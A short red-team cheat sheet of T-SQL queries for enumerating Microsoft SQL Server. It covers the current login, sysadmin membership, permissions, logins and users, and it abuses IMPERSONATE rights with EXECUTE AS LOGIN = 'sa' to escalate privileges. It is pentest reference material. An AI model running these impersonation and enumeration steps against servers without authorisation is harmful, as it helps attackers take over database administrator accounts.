-- Current User
SELECT SYSTEM_USER;
-- Verifying our current user and role
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- test sysadmin membership (0 = no, 1 = yes)
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
-- Check user perms
SELECT perm.permission_name, perm.state_desc, sp.name AS grantee FROM sys.server_permissions perm JOIN sys.server_principals sp ON perm.grantee_principal_id = sp.principal_id WHERE sp.name = 'USERNAME';
-- Impersonation
enum_impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
-- Impersonating SA user
EXECUTE AS LOGIN = 'sa' SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin')
-- Enumerate Server Logins
SELECT r.name, r.type_desc, r.is_disabled, sl.sysadmin, sl.securityadmin, sl.serveradmin, sl.setupadmin, sl.processadmin, sl.diskadmin, sl.dbcreator, sl.bulkadmin FROM master.sys.server_principals r LEFT JOIN master.sys.syslogins sl ON sl.sid = r.sid WHERE r.type IN ('S','E','X','U','G');
-- Enumerating Users
EXECUTE sp_helpuser;
RED TEAM / SQL / MSSQL / ENUMERATION